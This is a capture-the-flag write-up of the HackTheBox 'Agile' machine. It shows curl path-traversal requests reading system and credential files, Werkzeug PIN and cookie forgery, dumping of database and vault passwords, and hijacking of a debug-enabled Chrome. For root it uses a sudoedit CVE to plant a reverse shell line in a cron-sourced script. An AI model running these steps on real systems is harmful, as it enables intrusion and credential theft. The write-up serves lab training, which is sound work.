Agile Writeup

05 August 2023 #CTF #HTB #box #medium #linux

agile info



$ sudo nmap -sC -sV
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)
|_  256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


The website is a password manager web app:


We can register an account and create new passwords, etc.

When using the site, you'll most likely encounter this error:

error message

This shows that the application is built with Flask, and since we are seeing this call trace, debug mode is enabled which means we can access a python console:

need pin

But it is protected by a PIN...

There is also an export functionality to download our vault as a csv file. When making the request to /vault/export, we are redirected to a new /download endpoint:

export vault

This seems like a really good candidate for a file disclosure vulnerability:

read /etc/passwd

Indeed, we can read files on the server (you still need a valid account to hit this endpoint).


Forge Werkzeug Console PIN

The PIN used to protect the Werkzeug console is generated by using some values available locally. This hacktricks page explains it pretty well.

We need a few things:

We can get some of what we want by triggering an error in the app (in this case i looked for a file that doesn't exist):

flask error

We get the full path of Flask's as well as the class name which is wsgi_app. If you run Flask by itself, the class name will be Flask, but here the app is running via a production server like gunicorn, so the name changes.

We'll get the rest of what we need through the file disclosure. We can get the current username in /proc/self/environ:

$ curl -s -b "session=<your_cookie>" 'superpass.htb/download?fn=../proc/self/environ' | sed 's/\x00/\n/g'

We are running as www-data.

To get the MAC address, we first need to know the name of the network interface. We'll find it in /proc/net/arp:

$ curl -s -b "session=<your_cookie>" 'superpass.htb/download?fn=../proc/net/arp'
IP address       HW type     Flags       HW address            Mask     Device       0x1         0x2         00:50:56:b9:ee:c2     *        eth0

Nice, now let's read /sys/class/net/eth0/address:

$ curl -s -b "session=<your_cookie>" 'superpass.htb/download?fn=../sys/class/net/eth0/address'

We need to have it in decimal format:

$ echo $((0x005056b91d9d))

And finally, we'll get /etc/machine-id and /proc/self/cgroup:

$ curl -s -b "session=<your_cookie>" 'superpass.htb/download?fn=../etc/machine-id'

$ curl -s -b "session=<your_cookie>" 'superpass.htb/download?fn=../proc/self/cgroup'

We only want what's after the last / in /proc/self/cgroup -> ed5b159560f54721827644bc9b220d00superpass.service.

Now that we are set, let's use the script for the hacktricks page to generate the PIN:

$ python

Bonus: unintended (patched)

When the box was released, there was a hardcoded secret key in ../app/app/superpass/

app.config['SECRET_KEY'] = 'MNOHFl8C4WLc3DQTToeeg8ZT7WpADVhqHHXJ50bPZY6ybYKEr76jNvDfsWD'

(We know the path from looking at /proc/self/environ).

That secret is used to sign cookies, so we could just forge our own cookie to impersonate other users:

flask-unsign -s --secret 'MNOHFl8C4WLc3DQTToeeg8ZT7WpADVhqHHXJ50bPZY6ybYKEr76jNvDfsWD' -c "{'_fresh': True, '_id': 'b65517587dbc4fab581453f7ec54db73d1a3b4f4185271f530244274fa2bfdea5bc405490cc690110fa7e2c2699c53317478867e4838c1d51b3ecf25d89e312d', '_user_id': '2'}"

With "_user_id": "2", we get access to the vault of the "Corum" user, and we can use one of his passwords to SSH in.

Now if you check, it's just random bytes:

app.config['SECRET_KEY'] = os.urandom(32)


www-data to Corum

We can find the DB creds in /app/config_prod.json:

www-data@agile:/app$ ls -lh
total 24K
drwxr-xr-x 5 corum     runner    4.0K Feb  8 16:29 app
drwxr-xr-x 9 runner    runner    4.0K Feb  8 16:36 app-testing
-r--r----- 1 dev_admin www-data    88 Jan 25  2023 config_prod.json
www-data@agile:/app$ cat config_prod.json
{"SQL_URI": "mysql+pymysql://superpassuser:dSA6l7q*yIVs$39Ml6ywvgK@localhost/superpass"}

Let's connect to the DB and dump passwords:

www-data@agile:/app$ mysql -u superpassuser -p'dSA6l7q*yIVs$39Ml6ywvgK'
mysql> use superpass
mysql> show tables;
| Tables_in_superpass |
| passwords           |
| users               |
2 rows in set (0.00 sec)

mysql> select * from passwords;
| id | created_date        | last_updated_data   | url            | username | password             | user_id |
|  3 | 2022-12-02 21:21:32 | 2022-12-02 21:21:32 | | 0xdf     | 762b430d32eea2f12970 |       1 |
|  4 | 2022-12-02 21:22:55 | 2022-12-02 21:22:55 |    | 0xdf     | 5b133f7a6a1c180646cb |       1 |
|  6 | 2022-12-02 21:24:44 | 2022-12-02 21:24:44 | mgoblog        | corum    | 47ed1e73c955de230a1d |       2 |
|  7 | 2022-12-02 21:25:15 | 2022-12-02 21:25:15 | ticketmaster   | corum    | 9799588839ed0f98c211 |       2 |
|  8 | 2022-12-02 21:25:27 | 2022-12-02 21:25:27 | agile          | corum    | 5db7caa1d13cc37c9fc2 |       2 |
5 rows in set (0.00 sec)

We can log in as Corum with 5db7caa1d13cc37c9fc2.

Corum to Edwards

After uploading and running pspy, we can see some interesting processes:

CMD: UID=1001  PID=30987  | /usr/bin/google-chrome --remote-debugging-port=41829 --crash-dumps-dir=/tmp --disable-background-networking --enable-automation --headless
CMD: UID=1001  PID=31168  | /bin/bash /app/
CMD: UID=0     PID=1293   | /bin/bash -c source /app/venv/bin/activate

It's interesting to note that Google Chrome is running with a remote debugging port which means we can control this browser from another process (for example using selenium).

Let's take a look at /app/


# update prod with latest from testing constantly assuming tests are passing

echo "Starting test_and_update"

# if already running, exit
ps auxww | grep -v "grep" | grep -q "pytest" && exit

echo "Not already running. Starting..."

# start in dev folder
cd /app/app-testing

# system-wide source doesn't seem to happen in cron jobs
source /app/venv/bin/activate

# run tests, exit if failure
pytest -x 2>&1 >/dev/null || exit

# tests good, update prod (flask debug mode will load it instantly)
cp -r superpass /app/app/
echo "Complete!"

This cron job periodically runs tests on the testing version of the app, and if they pass, the test version overwrites the production version (this is why we get the MySQL error when using the site).

It's using the pytest framework with selenium in order to test the website as if it was a real user (like logging in, adding a password, ...):

import os
import pytest
import time
from selenium import webdriver
from import Options
from import By
from import WebDriverWait

with open('/app/app-testing/tests/functional/creds.txt', 'r') as f:
    username, password =':')

def driver():
    options = Options()
    driver = webdriver.Chrome(options=options)
    yield driver

def test_login(driver):
    print("starting test_login")

We'll write a quick and dirty python script to connect to this remote Chrome instance and go to http://test.superpass.htb/vault to see if there are any passwords:

from selenium import webdriver
from import Options

options = Options()
options.add_experimental_option("debuggerAddress", "")
driver = webdriver.Chrome(options=options)


Run it:

corum@agile:~$ python3
            <th scope="col" width="30%">Site</th>
            <th scope="col" width="30%">Username</th>
            <th scope="col" width="30%">Password</th>
    <tbody hx-target="closest tr" hx-swap="outerHTML swap:.25s">

            <tr class="password-row">
        <a hx-get="/vault/edit_row/1" hx-include="closest tr"><i class="fas fa-edit"></i></a>
        <a hx-delete="/vault/delete/1"><i class="fa-solid fa-trash"></i></a>

            <tr class="password-row">
        <a hx-get="/vault/edit_row/2" hx-include="closest tr"><i class="fas fa-edit"></i></a>
        <a hx-delete="/vault/delete/2"><i class="fa-solid fa-trash"></i></a>

We can login as Edwards with d07867c6267dcb5df0af.

Edwards to root

Edwards can run sudo:

edwards@agile:~$ sudo -l
[sudo] password for edwards:
Matching Defaults entries for edwards on agile:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User edwards may run the following commands on agile:
    (dev_admin : dev_admin) sudoedit /app/config_test.json
    (dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt

More specifically, we are only able to edit these 2 files as the "dev_admin" user.

The sudo version (1.9.9) is vulnerable to CVE-2023-22809.

TL;DR: by appending -- to the EDITOR environment variable, we can edit arbitrary files as "dev_admin".

We saw earlier when running pspy that there is a cron job running as root that is sourcing /app/venv/bin/activate

It turns out this file writable by the dev_admin group:

edwards@agile:/app$ ls -lh /app/venv/bin
total 1.4M
-rw-r--r-- 1 root dev_admin 8.9K Aug  2 16:39 Activate.ps1
-rw-rw-r-- 1 root dev_admin 2.0K Aug  2 16:39 activate

We'll add a reverse shell payload at the start of the file using the sudo exploit:

edwards@agile:~$ EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin -g dev_admin /app/config_test.json

edwards@agile:~$ head /app/venv/bin/activate
# This file must be used with "source bin/activate" *from bash*
# you cannot run it directly
bash -c 'bash -i >& /dev/tcp/ 0>&1'

deactivate () {
    # reset old environment variables
    if [ -n "${_OLD_VIRTUAL_PATH:-}" ] ; then
        export PATH
        unset _OLD_VIRTUAL_PATH

Now we wait 1 or 2 minutes for the cron job to run and we should get our root shell:

$ nc -lnvp 443
Ncat: Version 7.94SVN ( )
Ncat: Listening on [::]:443
Ncat: Listening on
Ncat: Connection from
bash: cannot set terminal process group (3654): Inappropriate ioctl for device
bash: no job control in this shell

Key Takeaways